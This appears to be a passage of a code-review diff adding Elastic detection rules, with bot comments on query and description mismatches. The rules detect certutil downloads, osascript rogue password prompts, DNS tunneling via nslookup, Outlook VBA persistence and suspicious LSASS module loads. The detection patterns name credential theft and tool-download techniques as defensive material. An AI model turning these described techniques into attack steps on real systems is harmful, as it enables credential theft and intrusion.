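Review bot: The `not process.args : (...)` exclusion in the query matches a listed bundle identifier in any argument position, not specifically the value passed after `-i`, so the allow-list is broader than the rule name and description imply. If the intent is to exclude only those plugins being enabled, anchoring each entry on the command line, e.g. `not process.command_line : "* -i com.google.GoogleDrive.FinderSyncAPIExtension*"`, ties the identifier to the plugin argument (and `process.command_line` would then need adding to `required_fields`). If the looser argument match is deliberate, a short sentence in a `note` or the description saying so would help anyone tuning the rule.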
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies certutil.exe making a network connection. Adversaries could abuse certutil.exe to download a certificate, or malware, from a remote URL.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Network Connection via Certutil", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources in order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in [IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine 
the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
If trusted software uses this command and the triage has not identified anything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", + "https://frsecure.com/malware-incident-response-playbook/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3838e0e3-1850-4850-a411-2e8c5ba40ba8", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": 
"https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "3838e0e3-1850-4850-a411-2e8c5ba40ba8_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_107.json b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_107.json new file mode 100644 index 00000000000..2e5e437bf6c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/38948d29-3d5d-42e3-8aec-be832aaaf8eb_107.json 
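Review bot: The `cidrmatch` exclusion list in the query covers the IPv4 special-purpose ranges but on the IPv6 side lists only `::1`, `FE80::/10` and `FF00::/8`; unique-local addresses `fc00::/7`, the IPv6 counterpart of the excluded RFC 1918 ranges, are not excluded, so certutil.exe reaching an internal IPv6 host alerts while the same connection over IPv4 would not. `0.0.0.0/8` from the referenced IANA IPv4 registry is also absent, though that may be deliberate. If the asymmetry is intentional, a sentence in the `note` field stating that internal IPv6 destinations are in scope would save triage time; otherwise adding `"fc00::/7"` to the list would make the two address families consistent.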
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of osascript to execute scripts via standard input that may prompt a user with a rogue dialog for credentials.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Prompt for Credentials with OSASCRIPT", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.name : \"osascript\" and\n process.command_line : \"osascript*display dialog*password*\"\n", + "references": [ + "https://github.com/EmpireProject/EmPyre/blob/master/lib/modules/collection/osx/prompt.py", + "https://ss64.com/osx/osascript.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "38948d29-3d5d-42e3-8aec-be832aaaf8eb", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1056", + "name": "Input Capture", + "reference": "https://attack.mitre.org/techniques/T1056/", + "subtechnique": [ + { + "id": "T1056.002", + "name": "GUI Input Capture", + "reference": "https://attack.mitre.org/techniques/T1056/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "38948d29-3d5d-42e3-8aec-be832aaaf8eb_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_106.json b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_106.json new file mode 100644 index 00000000000..8239a6191f0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_106.json 
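Review bot: The description says the rule identifies osascript executing scripts "via standard input", but the query matches only `process.command_line : "osascript*display dialog*password*"`, i.e. dialog text passed inline on the command line; a script supplied on stdin leaves nothing in `process.command_line`, so the description overstates what the query covers. Consider rewording to `"Identifies the use of osascript with an inline script that may prompt a user with a rogue dialog for credentials."`, or keeping the description and documenting the stdin limitation in the `setup` text so analysts know the gap exists.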
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to establish persistence on an endpoint by installing a rogue Microsoft Outlook VBA Template.", + "false_positives": [ + "A legitimate VBA for Outlook is usually configured interactively via OUTLOOK.EXE." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Microsoft Outlook VBA", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM\"\n", + "references": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "397945f3-d39a-4e6f-8bcb-9656c2031438", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: 
Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1137", + "name": "Office Application Startup", + "reference": "https://attack.mitre.org/techniques/T1137/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "397945f3-d39a-4e6f-8bcb-9656c2031438_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_107.json b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_107.json new file mode 100644 index 00000000000..6596dce4a67 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/397945f3-d39a-4e6f-8bcb-9656c2031438_107.json 
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to establish persistence on an endpoint by installing a rogue Microsoft Outlook VBA Template.", + "false_positives": [ + "A legitimate VBA for Outlook is usually configured interactively via OUTLOOK.EXE." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Microsoft Outlook VBA", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM\"\n", + "references": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "397945f3-d39a-4e6f-8bcb-9656c2031438", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: 
Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1137", + "name": "Office Application Startup", + "reference": "https://attack.mitre.org/techniques/T1137/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "397945f3-d39a-4e6f-8bcb-9656c2031438_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_110.json b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_110.json new file mode 100644 index 00000000000..3b0c26702ed --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3a59fc81-99d3-47ea-8cd6-d48d561fca20_110.json 
@@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule identifies a large number (15) of nslookup.exe executions with an explicit query type from the same host. This may indicate command and control activity utilizing the DNS protocol.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential DNS Tunneling via NsLookup", + "note": "## Triage and analysis\n\n### Investigating Potential DNS Tunneling via NsLookup\n\nAttackers can abuse existing network rules that allow DNS communication with external resources to use the protocol as their command and control and/or exfiltration channel.\n\nDNS queries can be used to infiltrate data such as commands to be run, malicious files, etc., and also for exfiltration, since queries can be used to send data to the attacker-controlled DNS server. This process is commonly known as DNS tunneling.\n\nMore information on how tunneling works and how it can be abused can be found on [Palo Alto Unit42 Research](https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors).\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the DNS query and identify the information sent.\n- Extract this communication's indicators of compromise (IoCs) and use traffic logs to search for other potentially compromised hosts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
If the parent process is trusted and the data sent is not sensitive nor command and control related, this alert can be closed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Immediately block the identified indicators of compromise (IoCs).\n- Implement any temporary network rules, procedures, and segmentation required to contain the attack.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Update firewall rules to be more restrictive.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id with maxspan=5m\n[process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"nslookup.exe\" and process.args:(\"-querytype=*\", \"-qt=*\", \"-q=*\", \"-type=*\")] with runs = 10\n", + "references": [ + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", 
+ "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3a59fc81-99d3-47ea-8cd6-d48d561fca20", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.004", + "name": "DNS", + "reference": "https://attack.mitre.org/techniques/T1071/004/" + } + ] + }, + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "type": "eql", + "version": 110 + }, + "id": "3a59fc81-99d3-47ea-8cd6-d48d561fca20_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_7.json b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_7.json new file mode 100644 index 00000000000..72c72bd7fca --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_7.json 
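Review bot: The description at the top of the hunk says the rule fires on "a large number (15) of nslookup.exe executions", but the sequence in the query is declared `with runs = 10`, so the documented threshold does not match the detection logic. One of the two should be corrected, either `"description": "This rule identifies a large number (10) of nslookup.exe executions with an explicit query type from the same host. ..."` or `with runs = 15` if 15 is the intended tuning. The investigation guide text is otherwise consistent with the query.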
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies LSASS loading an unsigned or untrusted DLL. Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Module Loaded by LSASS", + "query": "library where host.os.type == \"windows\" and process.executable : \"?:\\\\Windows\\\\System32\\\\lsass.exe\" and\n not (dll.code_signature.subject_name :\n (\"Microsoft Windows\",\n \"Microsoft Corporation\",\n \"Microsoft Windows Publisher\",\n \"Microsoft Windows Software Compatibility Publisher\",\n \"Microsoft Windows Hardware Compatibility Publisher\",\n \"McAfee, Inc.\",\n \"SecMaker AB\",\n \"HID Global Corporation\",\n \"HID Global\",\n \"Apple Inc.\",\n \"Citrix Systems, Inc.\",\n \"Dell Inc\",\n \"Hewlett-Packard Company\",\n \"Symantec Corporation\",\n \"National Instruments Corporation\",\n \"DigitalPersona, Inc.\",\n \"Novell, Inc.\",\n \"gemalto\",\n \"EasyAntiCheat Oy\",\n \"Entrust Datacard Corporation\",\n \"AuriStor, Inc.\",\n \"LogMeIn, Inc.\",\n \"VMware, Inc.\",\n \"Istituto Poligrafico e Zecca dello Stato S.p.A.\",\n \"Nubeva Technologies Ltd\",\n \"Micro Focus (US), Inc.\",\n \"Yubico AB\",\n \"GEMALTO SA\",\n \"Secure Endpoints, Inc.\",\n \"Sophos Ltd\",\n \"Morphisec Information Security 2014 Ltd\",\n \"Entrust, Inc.\",\n \"Nubeva Technologies Ltd\",\n \"Micro Focus (US), Inc.\",\n \"F5 Networks Inc\",\n \"Bit4id\",\n \"Thales DIS CPL USA, Inc.\",\n \"Micro Focus International plc\",\n \"HYPR Corp\",\n \"Intel(R) Software Development Products\",\n \"PGP Corporation\",\n \"Parallels International GmbH\",\n \"FrontRange Solutions Deutschland GmbH\",\n 
\"SecureLink, Inc.\",\n \"Tidexa OU\",\n \"Amazon Web Services, Inc.\",\n \"SentryBay Limited\",\n \"Audinate Pty Ltd\",\n \"CyberArk Software Ltd.\",\n \"McAfeeSysPrep\",\n \"NVIDIA Corporation PE Sign v2016\",\n \"Trend Micro, Inc.\",\n \"Fortinet Technologies (Canada) Inc.\",\n \"Carbon Black, Inc.\") and\n dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\", \"errorChaining\")) and\n\n not dll.hash.sha256 :\n (\"811a03a5d7c03802676d2613d741be690b3461022ea925eb6b2651a5be740a4c\",\n \"1181542d9cfd63fb00c76242567446513e6773ea37db6211545629ba2ecf26a1\",\n \"ed6e735aa6233ed262f50f67585949712f1622751035db256811b4088c214ce3\",\n \"26be2e4383728eebe191c0ab19706188f0e9592add2e0bf86b37442083ae5e12\",\n \"9367e78b84ef30cf38ab27776605f2645e52e3f6e93369c674972b668a444faa\",\n \"d46cc934765c5ecd53867070f540e8d6f7701e834831c51c2b0552aba871921b\",\n \"0f77a3826d7a5cd0533990be0269d951a88a5c277bc47cff94553330b715ec61\",\n \"4aca034d3d85a9e9127b5d7a10882c2ef4c3e0daa3329ae2ac1d0797398695fb\",\n \"86031e69914d9d33c34c2f4ac4ae523cef855254d411f88ac26684265c981d95\")\n", + "references": [ + "https://blog.xpnsec.com/exploring-mimikatz-part-2/", + "https://github.com/jas502n/mimikat_ssp" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dll.hash.sha256", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not 
added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "3a6001a0-0939-4bbe-86f4-47d8faeb7b97_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_8.json b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_8.json new file mode 100644 index 00000000000..2a5eef658c0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3a6001a0-0939-4bbe-86f4-47d8faeb7b97_8.json 
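Review bot: The `dll.code_signature.subject_name` allowlist inside the `query` string lists `"Nubeva Technologies Ltd"` and `"Micro Focus (US), Inc."` twice, so the duplicate entries should be dropped; the same list is repeated in the version-8 file added in the next hunk. The exclusion also accepts `dll.code_signature.status` values `errorExpired`, `errorChaining` and `errorCode_endpoint*` alongside `trusted`, so a subject name the endpoint could not validate back to a trusted root still satisfies the allowlist — if that is deliberate (agents reporting validation errors on legitimate vendor modules), it deserves a sentence in `description` or a `note` field so that tuners do not tighten it blindly. `description` also misspells the process as "LSSAS process"; `loaded into the LSASS process` is the intended wording.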
